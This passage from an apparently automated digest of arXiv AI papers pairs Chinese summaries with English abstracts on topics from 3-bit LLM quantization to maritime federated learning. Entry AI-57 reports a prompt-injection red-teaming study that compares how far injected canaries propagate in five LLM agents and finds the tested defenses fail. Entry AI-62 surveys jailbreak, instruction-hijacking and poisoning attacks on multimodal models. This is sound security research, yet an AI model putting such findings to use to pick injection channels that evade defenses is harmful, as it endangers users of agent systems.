Abstract:Deep learning models for drug-like molecules and proteins overwhelmingly reuse transformer architectures designed for natural language, yet whether molecular sequences benefit from different designs has not been systematically tested. We deploy autonomous architecture search via an agent across three sequence types (SMILES, protein, and English text as control), running 3,106 experiments on a single GPU. For SMILES, architecture search is counterproductive: tuning learning rates and schedules alone outperforms the full search (p = 0.001). For natural language, architecture changes drive 81% of improvement (p = 0.009). Proteins fall between the two. Surprisingly, although the agent discovers distinct architectures per domain (p = 0.004), every innovation transfers across all three domains with <1% degradation, indicating that the differences reflect search-path dependence rather than fundamental biological requirements. We release a decision framework and open-source toolkit for molecular modeling teams to choose between autonomous architecture search and simple hyperparameter tuning.
[AI-57] Kill-Chain Canaries: Stage-Level Tracking of Prompt Injection Across Attack Surfaces and Model Safety Tiers
【Quick Read】: This paper addresses the effectiveness of defenses against prompt injection attacks in generative AI agent systems, in particular how to localize the pipeline stage at which an attack propagates, thereby revealing the root causes of current defense failures. The key to its solution is an analysis framework based on kill-chain stage decomposition: a trackable cryptographic canary token is instrumented through four stages (Exposed, Persisted, Relayed, Executed) in systematic experiments on five frontier LLM agents (764 runs in total). The study finds that model safety is determined not by whether malicious content is seen (exposure is 100% for all models) but by whether that content propagates across pipeline stages: for example, Claude strips injections at the memory-write stage (ASR = 0/164) while GPT-4o-mini propagates canaries intact (ASR = 53%), and different attack surfaces (such as memory versus tool streams) produce stark contrasts (e.g., DeepSeek shows 0% ASR on memory surfaces but 100% on tool-stream surfaces). Finally, existing defenses fail because they mismatch the attack-surface threat model (all active defense conditions yield 100% ASR), while an intermediate sanitizing node (a Claude relay) decontaminates downstream agents (0/40 canaries survived).
Link: https://arxiv.org/abs/2603.28013
Authors: Haochuan Kevin Wang
Institution: Unknown
Subjects: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
Comments:
Abstract:We present a stage-decomposed analysis of prompt injection attacks against five frontier LLM agents. Prior work measures task-level attack success rate (ASR); we localize the pipeline stage at which each model’s defense activates. We instrument every run with a cryptographic canary token (SECRET-[A-F0-9]{8}) tracked through four kill-chain stages – Exposed, Persisted, Relayed, Executed – across four attack surfaces and five defense conditions (764 total runs, 428 no-defense attacked). Our central finding is that model safety is determined not by whether adversarial content is seen, but by whether it is propagated across pipeline stages. Concretely: (1) in our evaluation, exposure is 100% for all five models – the safety gap is entirely downstream; (2) Claude strips injections at write_memory summarization (0/164 ASR), while GPT-4o-mini propagates canaries without loss (53% ASR, 95% CI: 41–65%); (3) DeepSeek exhibits 0% ASR on memory surfaces and 100% ASR on tool-stream surfaces from the same model – a complete reversal across injection channels; (4) all four active defense conditions (write_filter, pi_detector, spotlighting, and their combination) produce 100% ASR due to threat-model surface mismatch; (5) a Claude relay node decontaminates downstream agents – 0/40 canaries survived into shared memory.
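The canary bookkeeping described above can be sketched as a regex scan over per-stage captured outputs; the stage names match the abstract, while the helper functions and the toy trace are illustrative assumptions:

```python
import re
import secrets

CANARY_RE = re.compile(r"SECRET-[A-F0-9]{8}")
STAGES = ["Exposed", "Persisted", "Relayed", "Executed"]

def plant_canary():
    """Mint a fresh canary token of the form SECRET-XXXXXXXX (8 hex chars)."""
    return "SECRET-" + secrets.token_hex(4).upper()

def kill_chain_depth(canary, stage_outputs):
    """Return the stages (in order) whose captured output still contains the
    canary. Propagation stops at the first stage that strips it."""
    reached = []
    for stage in STAGES:
        text = stage_outputs.get(stage, "")
        if canary in text:
            reached.append(stage)
        else:
            break
    return reached

# Toy trace: the injection is seen and written to memory, but the model
# drops it when relaying to the tool call (defense fires at summarization).
tok = "SECRET-DEADBEEF"
trace = {
    "Exposed":   f"user doc ... {tok} ...",
    "Persisted": f"memory entry: {tok}",
    "Relayed":   "tool call: fetch(url)",   # canary stripped here
    "Executed":  "",
}
print(kill_chain_depth(tok, trace))  # -> ['Exposed', 'Persisted']
```

Aggregating `kill_chain_depth` over many runs gives exactly the stage-level statistics the abstract reports (e.g., how often a canary survives past the memory-write stage).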
[AI-58] HeteroHub: An Applicable Data Management Framework for Heterogeneous Multi-Embodied Agent System
【Quick Read】: This paper addresses the practical deployment difficulties of heterogeneous multi-embodied agent systems, which must coordinate multiple embodied agents with diverse capabilities in dynamic environments but lack a unified management infrastructure for massive heterogeneous data (static metadata, task-aligned training corpora, and high-frequency sensor streams). The key to its solution is HeteroHub, a data-centric framework that integrates static metadata, task-aligned training corpora, and real-time data streams, supporting task-aware model training, context-sensitive execution, and closed-loop control driven by real-world feedback, thereby enabling scalable, maintainable, and evolvable embodied AI systems.
Link: https://arxiv.org/abs/2603.28010
Authors: Xujia Li, Xin Li, Junquan Huang, Beirong Cui, Zibin Wu, Lei Chen
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments: 4 pages, 2 figures
Abstract:Heterogeneous Multi-Embodied Agent Systems involve coordinating multiple embodied agents with diverse capabilities to accomplish tasks in dynamic environments. This process requires the collection, generation, and consumption of massive, heterogeneous data, which primarily falls into three categories: static knowledge regarding the agents, tasks, and environments; multimodal training datasets tailored for various AI models; and high-frequency sensor streams. However, existing frameworks lack a unified data management infrastructure to support the real-world deployment of such systems. To address this gap, we present HeteroHub, a data-centric framework that integrates static metadata, task-aligned training corpora, and real-time data streams. The framework supports task-aware model training, context-sensitive execution, and closed-loop control driven by real-world feedback. In our demonstration, HeteroHub successfully coordinates multiple embodied AI agents to execute complex tasks, illustrating how a robust data management framework can enable scalable, maintainable, and evolvable embodied AI systems.
[AI-59] SARL: Label-Free Reinforcement Learning by Rewarding Reasoning Topology
【Quick Read】: This paper addresses reinforcement learning's heavy dependence on verifiable rewards or labeled supervision when improving large models' reasoning ability: in open-ended domains where correctness is ambiguous and reasoning trajectories are unconstrained, conventional methods tend toward early exploitation rather than generalization. The key to its solution is structure-aware reinforcement learning (SARL), a label-free framework that constructs a Reasoning Map from intermediate thinking steps and rewards its small-world topology, shifting supervision from the final answer to the reasoning path itself. SARL encourages reasoning trajectories that are both locally coherent and globally efficient, significantly improving performance on math and open-ended tasks while exhibiting more stable training and stronger generalization.
Link: https://arxiv.org/abs/2603.27977
Authors: Yifan Wang, Bolian Li, David Cho, Ruqi Zhang, Fanping Sui, Ananth Grama
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments:
Abstract:Reinforcement learning has become central to improving large reasoning models, but its success still relies heavily on verifiable rewards or labeled supervision. This limits its applicability to open ended domains where correctness is ambiguous and cannot be verified. Moreover, reasoning trajectories remain largely unconstrained, and optimization towards final answer can favor early exploitation over generalization. In this work, we ask whether general reasoning ability can be improved by teaching models how to think (the structure of reasoning) rather than what to produce (the outcome of reasoning) and extend traditional RLVR to open ended settings. We introduce structure aware reinforcement learning (SARL), a label free framework that constructs a per response Reasoning Map from intermediate thinking steps and rewards its small world topology, inspired by complex networks and the functional organization of the human brain. SARL encourages reasoning trajectories that are both locally coherent and globally efficient, shifting supervision from destination to path. Our experiments on Qwen3-4B show SARL surpasses ground truth based RL and prior label free RL baselines, achieving the best average gain of 9.1% under PPO and 11.6% under GRPO on math tasks and 34.6% under PPO and 30.4% under GRPO on open ended tasks. Beyond good performance, SARL also exhibits lower KL divergence, higher policy entropy, indicating a more stable and exploratory training and generalized reasoning ability.
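A "small-world" reasoning map combines high local clustering with short global paths. As a simplified, hypothetical proxy for the reward described above (the abstract does not specify the exact formula; this scores average clustering divided by characteristic path length on a step graph), one could compute:

```python
from collections import deque

def clustering(adj):
    """Average local clustering coefficient of an undirected graph given
    as {node: set(neighbors)}."""
    total, n = 0.0, 0
    for v, nbrs in adj.items():
        k = len(nbrs)
        n += 1
        if k < 2:
            continue
        links = sum(1 for u in nbrs for w in nbrs if u < w and w in adj[u])
        total += 2.0 * links / (k * (k - 1))
    return total / n if n else 0.0

def avg_path_length(adj):
    """Mean shortest-path length over connected pairs (BFS from every node)."""
    dists, pairs = 0, 0
    for src in adj:
        seen = {src: 0}
        q = deque([src])
        while q:
            v = q.popleft()
            for u in adj[v]:
                if u not in seen:
                    seen[u] = seen[v] + 1
                    q.append(u)
        dists += sum(seen.values())
        pairs += len(seen) - 1
    return dists / pairs if pairs else 0.0

def small_world_reward(adj):
    """Simplified proxy: high clustering (local coherence) divided by
    characteristic path length (global efficiency)."""
    L = avg_path_length(adj)
    return clustering(adj) / L if L else 0.0

# Two triangles of steps ({0,1,2} and {3,4,5}) bridged by edge 2-3:
# locally clustered, globally reachable in few hops.
g = {0: {1, 2}, 1: {0, 2}, 2: {0, 1, 3}, 3: {2, 4, 5}, 4: {3, 5}, 5: {3, 4}}
print(round(small_world_reward(g), 3))  # -> 0.432
```

A chain of steps (no triangles) would score 0 on clustering, while a fully connected clique wastes edges without shortening paths; rewarding this ratio favors trajectories that are both coherent and efficient.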
[AI-60] CARV: A Diagnostic Benchmark for Compositional Analogical Reasoning in Multimodal LLMs
【Quick Read】: This paper addresses the deficiency of multimodal large language models (MLLMs) in compositional analogical reasoning: existing evaluations fail to test the ability to extract and compose rules from multiple sources, a critical component of higher-order intelligence. The core of the solution is the CARV (Compositional Analogical Reasoning in Vision) task and its accompanying 5,500-sample diagnostic benchmark, which extends analogical relations from a single object pair to multiple pairs and requires models to extract symbolic rules from each pair and compose transformations, providing a more complete measure of MLLMs' higher-order reasoning ability.
Link: https://arxiv.org/abs/2603.27958
Authors: Yongkang Du, Xiaohan Zou, Minhao Cheng, Lu Lin
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments:
Abstract:Analogical reasoning tests a fundamental aspect of human cognition: mapping the relation from one pair of objects to another. Existing evaluations of this ability in multimodal large language models (MLLMs) overlook the ability to compose rules from multiple sources, a critical component of higher-order intelligence. To close this gap, we introduce CARV (Compositional Analogical Reasoning in Vision), a novel task together with a 5,500-sample dataset as the first diagnostic benchmark. We extend the analogy from a single pair to multiple pairs, which requires MLLMs to extract symbolic rules from each pair and compose new transformations. Evaluation on state-of-the-art MLLMs reveals a striking performance gap, with even Gemini-2.5 Pro achieving only 40.4% accuracy, far below the human-level performance of 100%. Diagnostic analysis shows two consistent failure modes: (1) decomposing visual changes into symbolic rules, and (2) maintaining robustness under diverse or complex settings, highlighting the limitations of current MLLMs on this task.
[AI-61] Physics-Guided Transformer (PGT): Physics-Aware Attention Mechanism for PINNs
【Quick Read】: This paper addresses the reconstruction of continuous physical fields from sparse, irregular observations, a central challenge in scientific machine learning, especially for systems governed by partial differential equations (PDEs). Existing physics-informed methods typically impose the governing equations as soft penalty terms during optimization, often causing gradient imbalance, instability, and degraded physical consistency under limited data. The key to the solution is the Physics-Guided Transformer (PGT), which embeds physical structure directly into the self-attention mechanism: PGT adds a heat-kernel-derived additive bias to the attention logits, encoding diffusion dynamics and temporal causality; query coordinates attend to these physics-conditioned context tokens, and the resulting features are decoded by a FiLM-modulated sinusoidal implicit network that adaptively controls the spectral response. This design significantly improves stability, generalization, and physical fidelity under data-scarce conditions.
Link: https://arxiv.org/abs/2603.27929
Authors: Ehsan Zeraatkar, Rodion Podorozhny, Jelena Tešić
Institution: Unknown
Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
Comments:
Abstract:Reconstructing continuous physical fields from sparse, irregular observations is a central challenge in scientific machine learning, particularly for systems governed by partial differential equations (PDEs). Existing physics-informed methods typically enforce governing equations as soft penalty terms during optimization, often leading to gradient imbalance, instability, and degraded physical consistency under limited data. We introduce the Physics-Guided Transformer (PGT), a neural architecture that embeds physical structure directly into the self-attention mechanism. Specifically, PGT incorporates a heat-kernel-derived additive bias into attention logits, encoding diffusion dynamics and temporal causality within the representation. Query coordinates attend to these physics-conditioned context tokens, and the resulting features are decoded using a FiLM-modulated sinusoidal implicit network that adaptively controls spectral response. We evaluate PGT on the one-dimensional heat equation and two-dimensional incompressible Navier-Stokes systems. In sparse 1D reconstruction with 100 observations, PGT achieves a relative L2 error of 5.9e-3, significantly outperforming both PINNs and sinusoidal representations. In the 2D cylinder wake problem, PGT uniquely achieves both low PDE residual (8.3e-4) and competitive relative error (0.034), outperforming methods that optimize only one objective. These results demonstrate that embedding physics within attention improves stability, generalization, and physical fidelity under data-scarce conditions.
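The abstract describes a heat-kernel-derived additive bias on attention logits encoding diffusion and temporal causality. A minimal numeric sketch of that idea follows; the 1-D Gaussian kernel form, the `kappa` parameter, and the toy coordinates are our assumptions, not the paper's implementation:

```python
import math

def heat_kernel_bias(xs, ts, kappa=1.0):
    """Additive attention bias from the 1-D heat kernel:
    log K(x_i, x_j; dt) = -(x_i - x_j)^2 / (4 * kappa * dt), with -inf for
    non-causal pairs (t_j > t_i), enforcing temporal causality."""
    n = len(xs)
    bias = [[0.0] * n for _ in range(n)]
    for i in range(n):
        for j in range(n):
            dt = ts[i] - ts[j]
            if dt < 0:
                bias[i][j] = float("-inf")   # future tokens are masked out
            else:
                bias[i][j] = -((xs[i] - xs[j]) ** 2) / (4.0 * kappa * max(dt, 1e-6))
    return bias

def softmax_row(logits):
    m = max(l for l in logits if l != float("-inf"))
    exps = [math.exp(l - m) if l != float("-inf") else 0.0 for l in logits]
    s = sum(exps)
    return [e / s for e in exps]

# A query at (x=0.0, t=1.0) attends over three context tokens; with all
# content logits zero, the heat-kernel bias alone favors nearby points.
xs = [0.0, 0.1, 2.0]
ts = [1.0, 0.5, 0.5]
bias = heat_kernel_bias(xs, ts)
weights = softmax_row([0.0 + b for b in bias[0]])   # content logits all zero
print([round(w, 3) for w in weights])  # distant token at x=2.0 is suppressed
```

Because the bias is added to the logits before the softmax, it multiplies the attention weights by the heat kernel itself, so spatially distant or acausal tokens receive exponentially less weight.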
[AI-62] Adversarial Attacks on Multimodal Large Language Models: A Comprehensive Survey
【Quick Read】: This paper addresses the new and amplified vulnerabilities that multimodal large language models (MLLMs) exhibit under adversarial attacks. The key to its solution is a systematic taxonomy that organizes attacks by attacker objective, together with a vulnerability-centric analysis that links integrity attacks, safety and jailbreak failures, control and instruction hijacking, and training-time poisoning to shared architectural and representational weaknesses. This provides an explanatory foundation for understanding adversarial behavior in MLLMs and informs the design and development of more robust, secure multimodal language systems.
Link: https://arxiv.org/abs/2603.27918
Authors: Bhavuk Jain, Sercan Ö. Arık, Hardeo K. Thakur
Institution: Unknown
Subjects: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI)
Comments: Survey paper, 37 pages, 10 figures, accepted at TMLR
Abstract:Multimodal large language models (MLLMs) integrate information from multiple modalities such as text, images, audio, and video, enabling complex capabilities such as visual question answering and audio translation. While powerful, this increased expressiveness introduces new and amplified vulnerabilities to adversarial manipulation. This survey provides a comprehensive and systematic analysis of adversarial threats to MLLMs, moving beyond enumerating attack techniques to explain the underlying causes of model susceptibility. We introduce a taxonomy that organizes adversarial attacks according to attacker objectives, unifying diverse attack surfaces across modalities and deployment settings. Additionally, we also present a vulnerability-centric analysis that links integrity attacks, safety and jailbreak failures, control and instruction hijacking, and training-time poisoning to shared architectural and representational weaknesses in multimodal systems. Together, this framework provides an explanatory foundation for understanding adversarial behavior in MLLMs and informs the development of more robust and secure multimodal language systems.
[AI-63] ITQ3_S: High-Fidelity 3-bit LLM Inference via Interleaved Ternary Quantization with Rotation-Domain Smoothing
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在3比特权重量化(Weight Quantization)过程中因权重分布的重尾特性与通道间异常值导致的灾难性精度损失问题。传统3-bit量化方法难以有效处理此类非均匀分布,从而显著降低模型性能。其解决方案的关键在于提出一种名为ITQ3_S(Interleaved Ternary Quantization – Specialized)的新量化格式,该方法引入TurboQuant(TQ)策略——基于快速沃尔什-哈达玛变换(Fast Walsh-Hadamard Transform, FWHT)的旋转域自适应量化机制,在量化前对权重空间进行预旋转,将异常值能量均匀分散至整个向量,诱导出近似高斯分布,从而更适配统一的三元量化编码。进一步地,作者设计了一种数学上严格可逆的反量化流程,利用256点逆沃尔什-哈达玛变换(Inverse Walsh-Hadamard Transform)融合到CUDA共享内存加载阶段,实现离线量化与在线推理间的零误差往返保真度(zero-error round-trip fidelity)。理论证明表明,对于任意长度为256的权重向量,重构误差满足 $\|\hat{\mathbf{w}} - \mathbf{w}\|_2 \leq \epsilon_q$,且 $\epsilon_q$ 仅由三元量化网格决定,并严格优于同等比特预算下的所有均匀3-bit基线方案。
链接: https://arxiv.org/abs/2603.27914
作者: Edward J. Yoon
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Distributed, Parallel, and Cluster Computing (cs.DC)
备注: 12 pages, 4 figures, 3 tables
Abstract:We present \textbf{ITQ3_S} (Interleaved Ternary Quantization – Specialized), a novel 3-bit weight quantization format for large language models (LLMs) that integrates \textbf{TurboQuant (TQ)}, a rotation-domain adaptive quantization strategy based on the Fast Walsh-Hadamard Transform (FWHT). Conventional 3-bit quantization methods suffer from catastrophic precision loss caused by heavy-tailed weight distributions and inter-channel outliers. ITQ3_S addresses this fundamental limitation by pre-rotating the weight space via FWHT prior to quantization, effectively spreading outlier energy across the entire vector and inducing a near-Gaussian distribution amenable to uniform ternary coding. Critically, we derive a mathematically rigorous dequantization procedure that inverts the FWHT exactly using a 256-point Inverse Walsh-Hadamard Transform fused into the CUDA shared-memory loading stage, ensuring zero-error round-trip fidelity between offline quantization and online inference. We prove that for any weight vector $\mathbf{w} \in \mathbb{R}^{256}$ processed by our pipeline, the reconstruction satisfies $\|\hat{\mathbf{w}} - \mathbf{w}\|_2 \leq \epsilon_q$, where $\epsilon_q$ is determined solely by the ternary quantization grid and is strictly smaller than any uniform 3-bit baseline under equal bit-budget constraints. Empirically, on the NVIDIA RTX 5090 (Blackwell architecture), ITQ3_S achieves perplexity competitive with FP16 baselines while delivering throughput exceeding $1.5\times$ that of 4-bit alternatives, owing to optimized DP4A and Tensor Core scheduling in the interleaved memory layout. Our results establish ITQ3_S as a practical, mathematically grounded solution for high-fidelity LLM deployment on consumer-grade hardware.
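作为补充,下面用几行 Python 勾勒摘要所描述的"旋转 → 三元量化 → 精确逆旋转"流程。这只是基于摘要的假设性草图,并非论文官方实现:`ternary_quant` 的阈值与网格取法为示例假设,ITQ3_S 实际的 interleaved 编码与 CUDA 融合细节摘要中未给出。

```python
import numpy as np

def fwht(x):
    """Orthonormal fast Walsh-Hadamard transform (self-inverse); len(x) must be 2^k."""
    x = x.astype(np.float64).copy()
    n, h = len(x), 1
    while h < n:
        for i in range(0, n, h * 2):
            for j in range(i, i + h):
                a, b = x[j], x[j + h]
                x[j], x[j + h] = a + b, a - b
        h *= 2
    return x / np.sqrt(n)  # orthonormal: fwht(fwht(x)) == x

def ternary_quant(v):
    """Toy ternary grid {-s, 0, +s}: threshold at half the mean magnitude."""
    s = np.mean(np.abs(v))
    t = 0.5 * s
    return np.where(v > t, s, np.where(v < -t, -s, 0.0))

def quantize_rotated(w):
    """Rotate, ternary-quantize in the rotated domain, then invert exactly."""
    return fwht(ternary_quant(fwht(w)))
```

由于 FWHT 是正交变换,旋转域中的量化误差范数在逆变换后严格保持不变,这正是摘要中"零误差往返"论断的数学基础。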
[AI-64] Kernel Dynamics under Path Entropy Maximization
【速读】:该论文试图解决的问题是:如何从信息热力学和变分原理的角度,理解并建模表示结构(即核函数)在动态演化过程中的自洽性与稳定性,从而揭示复杂系统中区分能力(distinction structure)的形成机制。其解决方案的关键在于提出一个基于路径熵最大化(Maximum Caliber, MaxCal)的变分框架,将核函数 $ k : X \times X \rightarrow \mathbb{R} $ 视为可动态演化的变量,而非固定参数;在此框架下,核空间中的轨迹对应于有效信息几何的演化路径,且优化景观内生于其自身遍历过程。通过建立自洽核的不动点条件、引入重整化群(Renormalization Group, RG)流作为结构化特例,并将深度网络训练中的神经切向核(Neural Tangent Kernel, NTK)演化视为实证候选实例,作者进一步指出:核变化所需的最小功由 $ \Delta W = k_B T \Delta I_k $ 给出,其中 $ \Delta I_k $ 是新解锁的互信息量,从而将表示结构的稳定性与热力学成本联系起来。
链接: https://arxiv.org/abs/2603.27880
作者: Jnaneshwar Das
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Robotics (cs.RO); Dynamical Systems (math.DS)
备注: 7 pages, 2 figures
Abstract:We propose a variational framework in which the kernel function $k : X \times X \rightarrow \mathbb{R}$, interpreted as the foundational object encoding what distinctions an agent can represent, is treated as a dynamical variable subject to path entropy maximization (Maximum Caliber, MaxCal). Each kernel defines a representational structure over which an information geometry on probability space may be analyzed; a trajectory through kernel space therefore corresponds to a trajectory through a family of effective geometries, making the optimization landscape endogenous to its own traversal. We formulate fixed-point conditions for self-consistent kernels, propose renormalization group (RG) flow as a structured special case, and suggest neural tangent kernel (NTK) evolution during deep network training as a candidate empirical instantiation. Under explicit information-thermodynamic assumptions, the work required for kernel change is bounded below by $\Delta W = k_B T \Delta I_k$, where $\Delta I_k$ is the mutual information newly unlocked by the updated kernel. In this view, stable fixed points of MaxCal over kernels correspond to self-reinforcing distinction structures, with biological niches, scientific paradigms, and craft mastery offered as conjectural interpretations. We situate the framework relative to assembly theory and the MaxCal literature, separate formal results from structured correspondences and conjectural bridges, and pose six open questions that make the program empirically and mathematically testable.
[AI-65] CARGO: Carbon-Aware Gossip Orchestration in Smart Shipping
【速读】:该论文旨在解决海上智能航运中分布式人工智能(Distributed AI)部署面临的挑战,即在船舶间连接不稳定、回传带宽有限且数据具有商业敏感性的环境下,如何实现高效、可靠且低碳的联邦学习(Federated Learning, FL)系统。现有基于服务器协调的FL方法难以适应海上网络的动态性与不可靠性,而现有去中心化方法又未将通信资源与碳排放、可靠性及长期参与均衡等关键因素协同管理。解决方案的关键在于提出CARGO框架——一种面向碳感知的去中心化通信调度机制,其将学习过程分为控制平面与数据平面:数据平面通过压缩式gossip通信执行本地优化,控制平面则动态决策每轮参与船舶、激活通信链路、更新压缩强度及触发恢复策略,从而在保障高精度的同时显著降低碳足迹和通信开销。
链接: https://arxiv.org/abs/2603.27857
作者: Alexandros S. Kalafatelis,Nikolaos Nomikos,Vasileios Nikolakakis,Nikolaos Tsoulakos,Panagiotis Trakadas
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Smart shipping operations increasingly depend on collaborative AI, yet the underlying data are generated across vessels with uneven connectivity, limited backhaul, and clear commercial sensitivity. In such settings, server-coordinated FL remains a weak systems assumption, depending on a reachable aggregation point and repeated wide-area synchronization, both of which are difficult to guarantee in maritime networks. A serverless gossip approach therefore represents a more natural approach, but existing methods still treat communication mainly as an optimization bottleneck, rather than as a resource that must be managed jointly with carbon cost, reliability, and long-term participation balance. In this context, this paper presents CARGO, a carbon-aware gossip orchestration framework for smart-shipping. CARGO separates learning into a control and a data plane. The data plane performs local optimization with compressed gossip exchange, while the control plane decides, at each round, which vessels should participate, which communication edges should be activated, how aggressively updates should be compressed, and when recovery actions should be triggered. We evaluate CARGO under a predictive-maintenance scenario using operational bulk-carrier engine data and a trace-driven maritime communication protocol that captures client dropout, partial participation, packet loss, and multiple connectivity regimes, derived from mobility-aware vessel interactions. Across the tested stress settings, CARGO consistently remains in the high-accuracy regime while reducing carbon footprint and communication overheads, compared to accuracy-competitive decentralized baselines. Overall, the conducted performance evaluation demonstrates that CARGO is a feasible and practical solution for reliable and resource-conscious maritime AI deployment.
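CARGO 的数据平面以"压缩 gossip 交换"为核心:每轮只在被激活的船间链路上交换稀疏化的模型差分。下面是一个极简示意(假设性草图,与论文实现无关;top-k 稀疏化与对称中点更新均为示例假设,控制平面的碳感知选边逻辑未包含在内):

```python
import numpy as np

def topk_compress(vec, k):
    # Keep the k largest-magnitude entries; zero the rest (sparse update).
    idx = np.argsort(np.abs(vec))[-k:]
    out = np.zeros_like(vec)
    out[idx] = vec[idx]
    return out

def gossip_round(models, edges, k):
    # One synchronous gossip round: each activated edge exchanges a
    # compressed model difference; both endpoints move toward the midpoint.
    new = [m.copy() for m in models]
    for i, j in edges:
        diff = topk_compress(models[j] - models[i], k)
        new[i] = new[i] + 0.5 * diff
        new[j] = new[j] - 0.5 * diff
    return new
```

当 k 取满维度时,单条边上的一轮交换即把两端模型拉到均值;k 越小,通信量与碳成本越低,但收敛越慢,这正是控制平面需要权衡的量。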
[AI-66] What-If Explanations Over Time: Counterfactuals for Time Series Classification
【速读】:该论文旨在解决时间序列分类任务中可解释性不足的问题,特别是如何生成有效的反事实解释(counterfactual explanations),即通过最小的输入变化来改变模型预测结果,从而增强模型决策的透明性和可信度。其解决方案的关键在于系统梳理并比较当前主流的反事实生成方法,包括基于实例的最近邻技术、模式驱动算法、基于梯度的优化方法以及生成式模型,并深入分析它们在有效性(validity)、接近性(proximity)、稀疏性(sparsity)和合理性(plausibility)等维度上的表现差异。此外,作者开发了一个开源实现库 CFTS,用于标准化评估流程并促进实际应用,为未来研究指明了方向,如用户中心设计、领域知识融合及时间序列预测中的反事实生成。
链接: https://arxiv.org/abs/2603.27792
作者: Udo Schlegel,Thomas Seidl
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注: 24 pages, 1 figure, 3 tables, accepted at the XAI 2026
Abstract:Counterfactual explanations emerge as a powerful approach in explainable AI, providing what-if scenarios that reveal how minimal changes to an input time series can alter the model’s prediction. This work presents a survey of recent algorithms for counterfactual explanations for time series classification. We review state-of-the-art methods, spanning instance-based nearest-neighbor techniques, pattern-driven algorithms, gradient-based optimization, and generative models. For each, we discuss the underlying methodology, the models and classifiers they target, and the datasets on which they are evaluated. We highlight unique challenges in generating counterfactuals for temporal data, such as maintaining temporal coherence, plausibility, and actionable interpretability, which distinguish the temporal from tabular or image domains. We analyze the strengths and limitations of existing approaches and compare their effectiveness along key dimensions (validity, proximity, sparsity, plausibility, etc.). In addition, we implemented an open-source implementation library, Counterfactual Explanations for Time Series (CFTS), as a reference framework that includes many algorithms and evaluation metrics. We discuss this library’s contributions in standardizing evaluation and enabling practical adoption of explainable time series techniques. Finally, based on the literature and identified gaps, we propose future research directions, including improved user-centered design, integration of domain knowledge, and counterfactuals for time series forecasting.
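综述中反复出现的三个评估维度 validity、proximity、sparsity 可以用几行代码表达(示意性草图:`predict` 代表任意黑盒分类器,下方测试中的均值阈值分类器仅为演示假设,CFTS 库的实际接口摘要中未给出):

```python
import numpy as np

def cf_metrics(x, x_cf, predict, target):
    # Standard counterfactual quality metrics for a univariate time series.
    validity = predict(x_cf) == target           # did the prediction flip?
    proximity = np.linalg.norm(x_cf - x)         # L2 distance to the original
    sparsity = np.mean(~np.isclose(x_cf, x))     # fraction of changed steps
    return validity, proximity, sparsity
```

时间序列场景的特殊性在于,这三项之外还需检查时间连贯性与合理性(plausibility),即修改后的片段是否仍像一条真实序列,这正是综述强调的与表格/图像反事实的区别。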
[AI-67] Let the Agent Steer: Closed-Loop Ranking Optimization via Influence Exchange
【速读】:该论文旨在解决推荐排序中因离线代理指标与线上业务效果之间存在系统性偏差而导致的优化失效问题,尤其是现有方法无法通过单一校准因子纠正不同指标间的非对称偏差。其核心解决方案是提出 Sortify——首个完全自主的大型生产级推荐系统排序优化智能体,关键在于三方面创新:(1)基于 Savage 主观期望效用理论构建双通道框架,分离离线-线上迁移修正(信念通道)与约束惩罚调整(偏好通道);(2)引入大语言模型(LLM)元控制器,作用于框架级参数而非底层搜索变量,提升决策抽象层级;(3)设计包含7个关系表的持久化记忆数据库,实现跨轮次学习。该方案以“影响份额”为核心指标,确保各因素贡献总和恒为100%,从而实现从诊断到参数部署的闭环自动化优化。
链接: https://arxiv.org/abs/2603.27765
作者: Yin Cheng,Liao Zhou,Xiyu Liang,Dihao Luo,Tewei Lee,Kailun Zheng,Weiwei Zhang,Mingchen Cai,Jian Dong,Andy Zhang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Recommendation ranking is fundamentally an influence allocation problem: a sorting formula distributes ranking influence among competing factors, and the business outcome depends on finding the optimal “exchange rates” among them. However, offline proxy metrics systematically misjudge how influence reallocation translates to online impact, with asymmetric bias across metrics that a single calibration factor cannot correct. We present Sortify, the first fully autonomous LLM-driven ranking optimization agent deployed in a large-scale production recommendation system. The agent reframes ranking optimization as continuous influence exchange, closing the full loop from diagnosis to parameter deployment without human intervention. It addresses structural problems through three mechanisms: (1) a dual-channel framework grounded in Savage’s Subjective Expected Utility (SEU) that decouples offline-online transfer correction (Belief channel) from constraint penalty adjustment (Preference channel); (2) an LLM meta-controller operating on framework-level parameters rather than low-level search variables; (3) a persistent Memory DB with 7 relational tables for cross-round learning. Its core metric, Influence Share, provides a decomposable measure where all factor contributions sum to exactly 100%. Sortify has been deployed across two Southeast Asian markets. In Country A, the agent pushed GMV from -3.6% to +9.2% within 7 rounds with peak orders reaching +12.5%. In Country B, a cold-start deployment achieved +4.15% GMV/UU and +3.58% Ads Revenue in a 7-day A/B test, leading to full production rollout.
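Sortify 的核心指标 Influence Share 要求各因子贡献之和恒为 100%。对一个线性排序公式,一种最小化的可分解归一化如下(假设性草图:按绝对贡献归一化的分解方式为示例假设,论文的实际定义未在摘要中给出):

```python
import numpy as np

def influence_share(weights, factor_scores):
    # Decompose a linear ranking score sum_i(w_i * s_i) into per-factor
    # shares of absolute contribution; shares always sum to exactly 100%.
    contrib = np.abs(np.asarray(weights) * np.asarray(factor_scores))
    return 100.0 * contrib / contrib.sum()
```

这种可分解性使得"影响交换"可以被量化:调整某个因子权重后,各因子份额的变化即对应排序影响力的再分配。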
[AI-68] Heracles: Bridging Precise Tracking and Generative Synthesis for General Humanoid Control
